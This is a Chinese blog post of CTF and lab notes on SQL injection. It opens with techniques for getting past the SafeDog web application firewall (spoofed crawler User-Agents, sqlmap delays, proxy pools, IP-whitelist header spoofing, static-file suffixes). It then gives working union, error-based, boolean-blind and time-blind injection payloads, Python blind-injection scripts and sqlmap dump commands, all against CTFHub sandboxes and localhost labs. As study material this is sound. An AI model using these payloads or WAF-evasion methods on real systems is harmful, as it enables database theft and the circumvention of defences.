<p>安全狗的流量防护是检测访问速度【同一ip访问多次会被ban】</p>
<p>=》<strong>可以延时、代理池、爬虫</strong> 绕过</p>
<ol type="1">
<li>爬虫 &gt; 百度 搜索引擎爬虫http头</li>
</ol>
<ul>
<li>sqlmap也可以自定义useragent头</li>
<li>在sqlmap目录下<code>lib/core/option.py</code>里的1425行</li>
<li>或者加参数<code>--user-agent="xxx"</code></li>
</ul>
<ol start="2" type="1">
<li>延时</li>
</ol>
<ul>
<li><code>--delay 1</code> 隔1s发一个数据包</li>
</ul>
<ol start="3" type="1">
<li>代理池</li>
</ol>
<p>拦一个ip我换一个，python爬虫脚本有关</p>
<h5 id="总结">总结</h5>
<p>⚠️类似的，若对其他地方头有拦截，写python脚本，--tamper加上【中转脚本】</p>
<p>也可以<code>-r 3.txt</code>把修改后的请求报文放到txt里，不要-u，用-r请求文件也可以实现自主绕过
-
即sqlmap注入本地脚本地址，=》本地搭建脚本（请求数据包自定义编写）=》目标地址
&gt; 百度 php自定义http数据包请求</p>
<h4 id="白名单绕过">白名单绕过</h4>
<ol type="1">
<li><p>ip白名单 获取对方服务器不会拦截的ip白名单，修改自己http header
<code>x-forwarded-for ..</code>等来绕过安全狗拦截【一般不好获取，获得对方服务器本身的ip更容易，自己不会防自己，也可以绕过】</p></li>
<li><p>静态资源 以前可以用，现在不一定
常见的静态文件：<code>.js .txt .jpg  .swf  .css</code>等，类似白名单机制，waf为了检测效率，不会检测这类文件名后缀的请求
<code>http://127.0.0.1/test.php?id=1</code>改为<code>http://127.0.0.1/test.php/1.js?=1</code>页面不会变，但能绕过检测
⚠️==Aspx、php只识别到前面的<code>.Aspx、.php</code>后面不识别==</p></li>
<li><p>url白名单
waf内置白名单，只要url中存在白名单的字符串，就不检测</p></li>
<li><p>爬虫白名单
通过对数据包伪造成搜索引擎访问，致使waf认为访问安全</p></li>
</ol>
<ul>
<li><code>UserAgent</code>，修改成搜索引擎的相关指纹，waf一旦检测到这个就不去管它了，否则会因多次访问而页面显示拦截</li>
</ul>
<h2 id="sql语法">sql语法</h2>
<ol type="1">
<li><p>==<a href="==https://www.yiibai.com/sql/sql-limit.html">limit语句</a>：限制显示多少行，offset：跳过前几行</p>
<ul>
<li>mysql里可以省去offset：<code>LIMIT x,y</code> ：跳过前x行取y行</li>
</ul></li>
<li><p><code>mid（string,start,length）</code>类似于substr，返回制定长度字符串子串【<strong>字符串从1开始</strong>】</p></li>
<li><p><code>like '%aa'</code>
匹配以aa结尾的字符串，<code>%</code>：匹配0个/一个/多个， <code>_</code>
匹配一个</p></li>
<li><p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/36363f4190df">sql里的反引号</a>：区分保留字，以免出错，如</p>
<pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> <span class="hljs-string">`select`</span> <span class="hljs-keyword">FROM</span> <span class="hljs-string">`test`</span> <span class="hljs-keyword">WHERE</span> <span class="hljs-keyword">select</span>=<span class="hljs-string">&#x27;字段值&#x27;</span></code></pre></li>
<li><p>别名as xxx，as可以省略</p></li>
</ol>
<h2 id="参考资料">🔗参考资料</h2>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&amp;mid=2247484372&amp;idx=1&amp;sn=ffcc51a88c9acf96c312421b75fc2a26&amp;chksm=ec1e33fcdb69baea53838fd545a236c0deb8a42f3b341ee0879c9e4ac9427c2147fab95b6669#rd">公众号，相关函数、报错注入布尔注入、时间注入，初级，配有小例子</a></p>
<h1 id="刷题">刷题✍️</h1>
<h3 id="整数型">整数型</h3>
<ol type="1">
<li>判断是整数型还是字符型，有区别=》整数型</li>
</ol>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439855.png" srcset="/img/loading.gif" alt="image-20210719143944632" style="zoom: 50%;"><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439856.png" srcset="/img/loading.gif" alt="image-20210719144008063" style="zoom:50%;"></p>
<ol start="2" type="1">
<li>判断列数，order by3页面不显示，则是2列</li>
</ol>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439857.png" srcset="/img/loading.gif" alt="image-20210719144050954" style="zoom:50%;"><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439858.png" srcset="/img/loading.gif" alt="image-20210719144101587" style="zoom:50%;"></p>
<ol start="3" type="1">
<li>union，<strong>注意第一个参数要无效！否则union后面的不显示</strong></li>
</ol>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439859.png" srcset="/img/loading.gif" alt="image-20210719144344234" style="zoom:50%;"></p>
<ol start="4" type="1">
<li>找当前库下所有表名</li>
</ol>
<pre><code class="hljs url">http:&#x2F;&#x2F;challenge-a1d9c1878cb3631f.sandbox.ctfhub.com:10800&#x2F;?id&#x3D;-1 union  select database(),group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439860.png" srcset="/img/loading.gif" alt="image-20210719144701149"></p>
<ol start="5" type="1">
<li>获取特定表列名【==注意列名要加引号==】</li>
</ol>
<pre><code class="hljs pgsql">?id=<span class="hljs-number">-1</span> <span class="hljs-keyword">union</span>  <span class="hljs-keyword">select</span> <span class="hljs-keyword">database</span>(),group_concat(<span class="hljs-built_in">column_name</span>) <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">columns</span> <span class="hljs-keyword">where</span> <span class="hljs-built_in">table_name</span>=<span class="hljs-string">&#x27;flag&#x27;</span></code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439861.png" srcset="/img/loading.gif" alt="image-20210719144940366"></p>
<ol start="6" type="1">
<li>获取具体数据【注意引号！】</li>
</ol>
<pre><code class="hljs crystal">?id=-<span class="hljs-number">1</span> <span class="hljs-class"><span class="hljs-keyword">union</span>  <span class="hljs-title">select</span> <span class="hljs-title">database</span>(),<span class="hljs-title">flag</span> <span class="hljs-title">from</span> <span class="hljs-title">flag</span></span></code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439862.png" srcset="/img/loading.gif" alt="image-20210719145233031"></p>
<h3 id="sqli_labs字符注入">sqli_labs字符注入</h3>
<ol type="1">
<li>发现是字符注入</li>
</ol>
<p>联合注入：</p>
<p>​ - 爆库名</p>
<p>​
<strong>可直接用hackbar输出，左边3是需3列才回显，右边是把输出放在第几列回显</strong></p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439863.png" srcset="/img/loading.gif" alt="image-20210523111629531" style="zoom:50%;"><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439864.png" srcset="/img/loading.gif" alt="image-20210523111656991" style="zoom: 50%;"></p>
<pre><code class="hljs mysql">http:&#x2F;&#x2F;localhost&#x2F;sqli-labs-master&#x2F;Less-1&#x2F;?id&#x3D;&#39;union select 1,group_concat(schema_name),3 from information_schema.schemata%23</code></pre>
<p>​ - 爆表名</p>
<pre><code class="hljs mysql">http:&#x2F;&#x2F;localhost&#x2F;sqli-labs-master&#x2F;Less-1&#x2F;?id&#x3D;&#39;union select 1,group_concat(table_name),3 from information_schema.tables where table_schema&#x3D;database()%23</code></pre>
<p>​ - 爆所有库列名</p>
<pre><code class="hljs mysql">http:&#x2F;&#x2F;localhost&#x2F;sqli-labs-master&#x2F;Less-1&#x2F;?id&#x3D;&#39;union select 1,group_concat(column_name),3 from information_schema.columns where table_schema&#x3D;database()%23</code></pre>
<p>​ - 爆当前库下指定表列名</p>
<pre><code class="hljs mysql">http:&#x2F;&#x2F;localhost&#x2F;sqli-labs-master&#x2F;Less-1&#x2F;?id&#x3D;&#39;union select 1,group_concat(column_name),3 from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;&#39;users&#39;%23</code></pre>
<p>无列名报错注入join查列名【这时无需保证字段数为3，直接union select
即可】</p>
<pre><code class="hljs mysql">http:&#x2F;&#x2F;localhost&#x2F;sqli-labs-master&#x2F;Less-1&#x2F;?id&#x3D;&#39;union select * from (select * from users as a join users b using(id,username))c%23
&#x2F;&#x2F;或者加上extractvalue，效果一样
http:&#x2F;&#x2F;localhost&#x2F;sqli-labs-master&#x2F;Less-1&#x2F;?id&#x3D;&#39;union select extractvalue(0x0a,concat(0x0a,(select * from (select * from users as a join users b using(id,username))c)))%23</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439865.png" srcset="/img/loading.gif" alt="image-20210523113654148" style="zoom:67%;"></p>
<h3 id="报错注入-1">报错注入</h3>
<ol type="1">
<li>发现是整数，2列</li>
</ol>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439866.png" srcset="/img/loading.gif" alt="image-20210719153315081" style="zoom:67%;"></p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439867.png" srcset="/img/loading.gif" alt="image-20210719153236931" style="zoom:67%;"><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439868.png" srcset="/img/loading.gif" alt="image-20210719153122597" style="zoom:67%;"><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439869.png" srcset="/img/loading.gif" alt="image-20210719153213247" style="zoom: 67%;"></p>
<ol start="2" type="1">
<li>利用<strong>hackbar的快捷键</strong>extractvalue报错注入</li>
</ol>
<pre><code class="hljs pgsql">?id=extractvalue(<span class="hljs-number">0x0a</span>,concat(<span class="hljs-number">0x0a</span>,(<span class="hljs-keyword">select</span> <span class="hljs-keyword">database</span>())))</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439870.png" srcset="/img/loading.gif" alt="image-20210719154014631" style="zoom:67%;"></p>
<ol start="4" type="1">
<li>查表名</li>
</ol>
<pre><code class="hljs pgsql">?id=extractvalue(<span class="hljs-number">0x0a</span>,concat(<span class="hljs-number">0x0a</span>,(<span class="hljs-keyword">select</span> group_concat(<span class="hljs-built_in">table_name</span>) <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">tables</span> <span class="hljs-keyword">where</span> table_schema=<span class="hljs-keyword">database</span>())))</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439871.png" srcset="/img/loading.gif" alt="image-20210719154125986" style="zoom:67%;"></p>
<ol start="5" type="1">
<li>查列名</li>
</ol>
<pre><code class="hljs pgsql">?id=extractvalue(<span class="hljs-number">0x0a</span>,concat(<span class="hljs-number">0x0a</span>,(<span class="hljs-keyword">select</span> group_concat(<span class="hljs-built_in">column_name</span>) <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">columns</span> <span class="hljs-keyword">where</span> table_schema=<span class="hljs-keyword">database</span>())))</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439872.png" srcset="/img/loading.gif" alt="image-20210719154218790" style="zoom:67%;"></p>
<ol start="6" type="1">
<li>查数据</li>
</ol>
<pre><code class="hljs sqf">?id=extractvalue(<span class="hljs-number">0</span>x0a,concat(<span class="hljs-number">0</span>x0a,(<span class="hljs-built_in">select</span> group_concat(<span class="hljs-built_in">flag</span>) <span class="hljs-keyword">from</span> <span class="hljs-built_in">flag</span>)))</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439873.png" srcset="/img/loading.gif" alt="image-20210719154257406" style="zoom:67%;"></p>
<h3 id="布尔注入">布尔注入</h3>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/Xxy605/article/details/109750292?utm_medium=distribute.pc_relevant.none-task-blog-baidujs_title-0&amp;spm=1001.2101.3001.4242">wp</a></p>
</blockquote>
<ol type="1">
<li>整数型，2列</li>
</ol>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439874.png" srcset="/img/loading.gif" alt="image-20210719155150592" style="zoom:67%;"><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439875.png" srcset="/img/loading.gif" alt="image-20210719155311112" style="zoom:67%;"></p>
<ol start="2" type="1">
<li>查找有无含flag列名的表=》有</li>
</ol>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439876.png" srcset="/img/loading.gif" alt="image-20210719155428893" style="zoom:80%;"></p>
<ol start="3" type="1">
<li>查询当前库下有几个表，【==注意！用and==，or一定返回success】=》两个表</li>
</ol>
<pre><code class="hljs pgsql">?id=<span class="hljs-number">1</span> <span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> count( <span class="hljs-built_in">TABLE_NAME</span>) <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">TABlES</span> <span class="hljs-keyword">where</span> TABLE_SCHEMA=<span class="hljs-keyword">database</span>( ) ) =<span class="hljs-number">2</span></code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439877.png" srcset="/img/loading.gif" alt="image-20210719160304316"></p>
<ol start="3" type="1">
<li>获取第一个表的长度=》4=》**怀疑表名叫flag</li>
</ol>
<pre><code class="hljs pgsql">?id=<span class="hljs-number">1</span> <span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> length( <span class="hljs-built_in">TABLE_NAME</span>) <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">TABlES</span> <span class="hljs-keyword">where</span> TABLE_SCHEMA=<span class="hljs-keyword">database</span>( ) <span class="hljs-keyword">limit</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span>) =<span class="hljs-number">4</span>
?id=<span class="hljs-number">1</span> <span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> length( <span class="hljs-built_in">TABLE_NAME</span>) <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">TABlES</span> <span class="hljs-keyword">where</span> TABLE_SCHEMA=<span class="hljs-keyword">database</span>( ) <span class="hljs-keyword">limit</span> <span class="hljs-number">1</span>,<span class="hljs-number">1</span>) =<span class="hljs-number">4</span>  【第二个表名也是<span class="hljs-number">4</span>长度】</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439878.png" srcset="/img/loading.gif" alt="image-20210719160513618"></p>
<ol start="3" type="1">
<li>查询当前数据库下两个表名第一个字母是不是f</li>
</ol>
<pre><code class="hljs pgsql">?id=<span class="hljs-number">1</span> <span class="hljs-keyword">and</span> mid((<span class="hljs-keyword">select</span> <span class="hljs-built_in">TABLE_NAME</span> <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">TABLES</span> <span class="hljs-keyword">where</span> TABLE_SCHEMA=<span class="hljs-keyword">database</span>( ) <span class="hljs-keyword">limit</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span>) ,<span class="hljs-number">1</span>,<span class="hljs-number">1</span>) =<span class="hljs-string">&#x27;f&#x27;</span>【第一个表报错，说明第二个表名是flag】
?id=<span class="hljs-number">1</span> <span class="hljs-keyword">and</span> mid((<span class="hljs-keyword">select</span> <span class="hljs-built_in">TABLE_NAME</span> <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">TABLES</span> <span class="hljs-keyword">where</span> TABLE_SCHEMA=<span class="hljs-keyword">database</span>( ) <span class="hljs-keyword">limit</span> <span class="hljs-number">1</span>,<span class="hljs-number">1</span>) ,<span class="hljs-number">1</span>,<span class="hljs-number">1</span>) =<span class="hljs-string">&#x27;f&#x27;</span>【success】</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439879.png" srcset="/img/loading.gif" alt="image-20210719161041707"></p>
<ol start="4" type="1">
<li>后面==用python自动化脚本布尔盲注爆破==【要跑一会】</li>
</ol>
<pre><code class="hljs python">重点代码：
<span class="hljs-comment">#对指定库指定表指定列爆数据（flag）</span>
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">getData</span>(<span class="hljs-params">database,table,column,str_list</span>):</span>
	<span class="hljs-comment">#初始化flag长度为1</span>
    j = <span class="hljs-number">1</span>
    <span class="hljs-comment">#j从1开始，无限循环flag长度</span>
    <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:
    	<span class="hljs-comment">#flag中每一个字符的所有可能取值</span>
        <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> str_list: <span class="hljs-comment">#str_list是字母表的ASCII码</span>
            new_url = url + <span class="hljs-string">&quot;?id=1 and substr((select &#123;&#125; from &#123;&#125;.&#123;&#125;),&#123;&#125;,1)=&#x27;&#123;&#125;&#x27;&quot;</span>.<span class="hljs-built_in">format</span>(column,database,table,j,<span class="hljs-built_in">chr</span>(i))
            r = requests.get(new_url)
            <span class="hljs-comment">#如果返回的页面有query_success，即盲猜成功，跳过余下的for循环</span>
            <span class="hljs-keyword">if</span> success_mark <span class="hljs-keyword">in</span> r.text:
            	<span class="hljs-comment">#显示flag</span>
                print(<span class="hljs-built_in">chr</span>(i),end=<span class="hljs-string">&quot;&quot;</span>)
                <span class="hljs-comment">#flag的终止条件，即flag的尾端右花括号</span>
                <span class="hljs-keyword">if</span> <span class="hljs-built_in">chr</span>(i) == <span class="hljs-string">&quot;&#125;&quot;</span>:
                    print()
                    <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>
                <span class="hljs-keyword">break</span>
        <span class="hljs-comment">#如果没有匹配成功，flag长度+1接着循环</span>
        j = j + <span class="hljs-number">1</span></code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439880.png" srcset="/img/loading.gif" alt="image-20210719170950999" style="zoom:80%;"></p>
<h3 id="时间盲注-1">时间盲注</h3>
<ul>
<li>sqlmap工具法：</li>
</ul>
<ol type="1">
<li>爆库名=》发现4个库名</li>
</ol>
<pre><code class="hljs apache"><span class="hljs-attribute">sqlmap</span> -u http://challenge-<span class="hljs-number">53394</span>f<span class="hljs-number">4</span>a<span class="hljs-number">591385</span>b<span class="hljs-number">3</span>.sandbox.ctfhub.com:<span class="hljs-number">10800</span>/?id=<span class="hljs-number">1</span> --dbs</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439881.png" srcset="/img/loading.gif" alt="image-20210719173257617" style="zoom:80%;"></p>
<ol start="2" type="1">
<li>爆表名</li>
</ol>
<pre><code class="hljs apache"><span class="hljs-attribute">sqlmap</span> -u http://challenge-c<span class="hljs-number">040</span>fe<span class="hljs-number">3754779</span>bb<span class="hljs-number">8</span>.sandbox.ctfhub.com:<span class="hljs-number">10800</span>/?id=<span class="hljs-number">1</span> -D sqli --tables</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439882.png" srcset="/img/loading.gif" alt="image-20210719223141434"></p>
<ol start="3" type="1">
<li>爆列名</li>
</ol>
<pre><code class="hljs apache"><span class="hljs-attribute">sqlmap</span> -u http://challenge-c<span class="hljs-number">040</span>fe<span class="hljs-number">3754779</span>bb<span class="hljs-number">8</span>.sandbox.ctfhub.com:<span class="hljs-number">10800</span>/?id=<span class="hljs-number">1</span> -D sqli -T flag --columns</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439883.png" srcset="/img/loading.gif" alt="image-20210719223210839" style="zoom:67%;"></p>
<ol start="4" type="1">
<li>爆数据</li>
</ol>
<pre><code class="hljs apache"><span class="hljs-attribute">sqlmap</span> -u http://challenge-c<span class="hljs-number">040</span>fe<span class="hljs-number">3754779</span>bb<span class="hljs-number">8</span>.sandbox.ctfhub.com:<span class="hljs-number">10800</span>/?id=<span class="hljs-number">1</span> -D sqli -T flag -C flag --dump</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439884.png" srcset="/img/loading.gif" alt="image-20210719224102387"></p>
<ul>
<li>手注法</li>
</ul>
<pre><code class="hljs sql">判断当前数据库名长，发现长度为4
?id=1 and if(length(database())=4,1,sleep(3))
判断当前库下表个数，为2时停三秒,说明有两张表
?id=1 and if((<span class="hljs-keyword">select</span> <span class="hljs-keyword">count</span>(table_name) <span class="hljs-keyword">from</span> information_schema.tables
 <span class="hljs-keyword">where</span> table_schema=<span class="hljs-keyword">database</span>())=<span class="hljs-number">2</span>,<span class="hljs-keyword">sleep</span>(<span class="hljs-number">3</span>),<span class="hljs-number">1</span>)</code></pre>
<ul>
<li>python自动脚本</li>
</ul>
<pre><code class="hljs python"><span class="hljs-comment"># -*- coding:utf-8 -*-</span>
<span class="hljs-keyword">import</span> requests
<span class="hljs-keyword">import</span> time
flag = <span class="hljs-string">&quot;&quot;</span>
<span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>,<span class="hljs-number">50</span>):
    <span class="hljs-built_in">min</span>=<span class="hljs-number">32</span>
    <span class="hljs-built_in">max</span>=<span class="hljs-number">127</span>
    mid=(<span class="hljs-built_in">min</span>+<span class="hljs-built_in">max</span>)//<span class="hljs-number">2</span>
    <span class="hljs-keyword">while</span> <span class="hljs-built_in">min</span>&lt;<span class="hljs-built_in">max</span>:
        starttime = time.time()
        <span class="hljs-comment">#pa = &#x27;1^if(ascii(substr(database(),&#123;&#125;,1))&gt;&#123;&#125;,sleep(2),-1)^1&#x27;.format(str(i),str(mid)) 爆库</span>
        <span class="hljs-comment">#pa = &quot;1^if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=&#x27;sqli&#x27;),&#123;&#125;,1))&gt;&#123;&#125;,sleep(2),-1)^1&quot;.format(str(i),str(mid)) 爆表</span>
        <span class="hljs-comment">#pa = &quot;1^if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=&#x27;flag&#x27;),&#123;&#125;,1))&gt;&#123;&#125;,sleep(2),-1)^1&quot;.format(str(i), str(mid)) 爆列</span>
        pa = <span class="hljs-string">&quot;1^if(ascii(substr((select group_concat(flag) from flag),&#123;&#125;,1))&gt;&#123;&#125;,sleep(2),-1)^1&quot;</span>.<span class="hljs-built_in">format</span>(<span class="hljs-built_in">str</span>(i), <span class="hljs-built_in">str</span>(mid))
        url = <span class="hljs-string">&quot;http://challenge-c040fe3754779bb8.sandbox.ctfhub.com:10800/?id=&quot;</span>
        ur=url+pa
        res = requests.get(ur)
        <span class="hljs-keyword">if</span> time.time() - starttime &gt; <span class="hljs-number">2</span>:
            <span class="hljs-built_in">min</span>=mid+<span class="hljs-number">1</span>
        <span class="hljs-keyword">else</span>:
            <span class="hljs-built_in">max</span>=mid
        mid = (<span class="hljs-built_in">min</span> + <span class="hljs-built_in">max</span>)//<span class="hljs-number">2</span>
    flag+=<span class="hljs-built_in">chr</span>(mid)
    print(flag)
    <span class="hljs-comment">#得到flag</span></code></pre>
<h2 id="无列名注入例子">无列名注入例子</h2>
<h3 id="swpuctf2019">SWPUCTF2019</h3>
<p>参考：<a target="_blank" rel="noopener" href="http://www.pdsdt.lovepdsdt.com/index.php/2019/12/12/mysql/">个人博客1知识点及wp</a>、<a target="_blank" rel="noopener" href="https://www.cnblogs.com/wangtanzhi/p/12241499.html">个人博客2，wp更详细</a>
、 <a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/193512">information_schema外的思考</a></p>
<p>==要点: information_schema被过滤，无列名注入==</p>
<h4 id="知识点">知识点：</h4>
<ol type="1">
<li><p><strong>空格和or被过滤，我们使用注释符号来代替空格</strong><code>/**/</code></p></li>
<li><p>or被过滤，我们无法使用order
by及information_schema进行数据查询，我们可以使用sys数据库进行数据查询，<strong>使用sys数据库需要满足：</strong></p></li>
</ol>
<blockquote>
<pre><code>1.数据库版本大于等于5.7  //version()
2.数据库用户为root@localohost用户  //user()  【管理员身份】</code></pre>
</blockquote>
<ol start="3" type="1">
<li><p>==！！==information_schema外，以下都可以查询表名信息【<strong>但查询不到列名，查询列名要用无列名注入</strong>】
<a target="_blank" rel="noopener" href="http://www.tristan.top/2020/04/22/Sql%E6%B3%A8%E5%85%A5%E4%B9%8B%E6%97%A0%E5%88%97%E5%90%8D%E6%B3%A8%E5%85%A5/">参考1</a></p>
<pre><code class="hljs q">sys.schema_auto_increment_columns  <span class="hljs-comment">//有自增id</span>
sys.schema_table_statistics_with_buffer <span class="hljs-comment">//无自增id</span>
mysql.innodb_table_stats  <span class="hljs-comment">//一般关闭</span>


<span class="hljs-comment">//获取当前库里的表名</span>
?id=<span class="hljs-number">-1</span>&#x27; <span class="hljs-built_in">union</span> <span class="hljs-built_in">all</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,group_concat(table_name)<span class="hljs-keyword">from</span> sys.schema_auto_increment_columns <span class="hljs-built_in">where</span> table_schema=database()--+
?id=<span class="hljs-number">-1</span>&#x27; <span class="hljs-built_in">union</span> <span class="hljs-built_in">all</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,group_concat(table_name)<span class="hljs-keyword">from</span> sys.schema_table_statistics_with_buffer <span class="hljs-built_in">where</span> table_schema=database()--+</code></pre></li>
</ol>
<p><img src="https://img2018.cnblogs.com/blog/1625650/202001/1625650-20200129212640240-1882833743.png" srcset="/img/loading.gif" alt="innodb" style="zoom:67%;"></p>
<p><img src="https://img2018.cnblogs.com/blog/1625650/202001/1625650-20200129212521529-1650453614.png" srcset="/img/loading.gif" alt="2"></p>
<p>查询表名：</p>
<pre><code class="hljs mysql">&#x2F;&#x2F;用sys.schema_auto_increment_columns
11&#39;&#x2F;**&#x2F;union&#x2F;**&#x2F;select&#x2F;**&#x2F;1,(select&#x2F;**&#x2F;group_concat(table_name)&#x2F;**&#x2F;from&#x2F;**&#x2F;sys.schema_auto_increment_colum ns&#x2F;**&#x2F;where&#x2F;**&#x2F;table_schema&#x3D;schema()),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,&#39;

&#x2F;&#x2F;或者mysql.innodb_table_stats
id&#x3D;-1&#39;&#x2F;**&#x2F;union&#x2F;**&#x2F;select&#x2F;**&#x2F;1,(select&#x2F;**&#x2F;group_concat(table_name)from&#x2F;**&#x2F;mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,&#39;1</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439885.png" srcset="/img/loading.gif" alt="image-20210522145658218" style="zoom:67%;"></p>
<p>查询列名，发现不行，用==无列名注入==：<strong>第一列应该为id所以从第二列找，第二列可能为name，第三列为password</strong></p>
<pre><code class="hljs mysql">重点：获取第二列所有行的数据：
(select group_concat(a) from (select 1,2 as a,3 union select*from users)c)  &#x2F;&#x2F;第二列别名为a，第一列应该为id

111&#39;&#x2F;**&#x2F;union&#x2F;**&#x2F;select&#x2F;**&#x2F;1，(select&#x2F;**&#x2F;group_concat(a)&#x2F;**&#x2F;from&#x2F;**&#x2F;(select&#x2F;**&#x2F;1,2&#x2F;**&#x2F;as&#x2F;**&#x2F;a,3&#x2F;**&#x2F;union&#x2F;**&#x2F;select*from&#x2F;**&#x2F;users)c),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,&#39;</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439886.png" srcset="/img/loading.gif" alt="image-20210522150318206" style="zoom:67%;"></p>
<p>可以看到flag在第二个，我们查询一下对应第三列的值，即可查询出flag：</p>
<pre><code class="hljs mysql">重点：(select group_concat(b) from (select 1,2,3 as b union select*from users)c) &#x2F;&#x2F;查询flag对应第三列的值

111&#39;&#x2F;**&#x2F;union&#x2F;**&#x2F;select&#x2F;**&#x2F;1,(select&#x2F;**&#x2F;group_concat(b)&#x2F;**&#x2F;from&#x2F;**&#x2F;(select&#x2F;**&#x2F;1,2,3&#x2F;**&#x2F;as&#x2F;**&#x2F;b&#x2F;**&#x2F;union&#x2F;**&#x2F;select*from&#x2F;**&#x2F;users)c),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,&#39;</code></pre>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/202401041439887.png" srcset="/img/loading.gif" alt="image-20210522150330829" style="zoom:67%;"></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/CTF/">CTF</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/CTF/">CTF</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">博客文章采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处，有疑问欢迎联系:)</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/09/16/%E9%99%87%E5%89%91%E6%9D%AF%E9%83%A8%E5%88%86WP/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">陇剑杯部分WP</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/06/19/%E7%BD%91%E7%BB%9C%E8%BF%9E%E6%8E%A5/">
                        <span class="hidden-mobile">内网？公网？局域网？</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
